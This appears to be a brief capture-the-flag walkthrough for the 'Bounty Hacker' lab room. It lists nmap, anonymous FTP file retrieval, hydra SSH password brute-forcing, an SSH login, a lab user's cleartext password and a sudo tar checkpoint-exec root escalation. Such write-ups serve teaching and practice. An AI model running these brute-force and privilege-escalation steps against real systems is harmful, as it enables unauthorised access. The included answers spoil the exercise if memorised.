Skip to content

Bounty Hacker

Bounty Hacker Logo

Bounty Hacker

This guide contains the answer and steps necessary to get to them for the Bounty Hacker room.

Living up to the title.

Commands:

nmap -sV 10.10.216.171 ftp 10.10.216.171 get task.txt cat task.txt get locks.txt cat locks.txt hydra -l user -P locks.txt ssh://10.10.216.171:22 -t 4
hydra -l lin -P locks.txt ssh://10.10.216.171:22 -t 4 ssh lin@10.10.216.171 cat user.txt susudo

RedDr4gonSynd1cat3

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh tar: Removing leading `/' from member names

  1. Who wrote the task list?

Click for answer

  1. What service can you bruteforce with the text file found?

Click for answer

  1. What is the users password?

Click for answer

  1. user.txt

Click for answer

  1. root.txt

Click for answer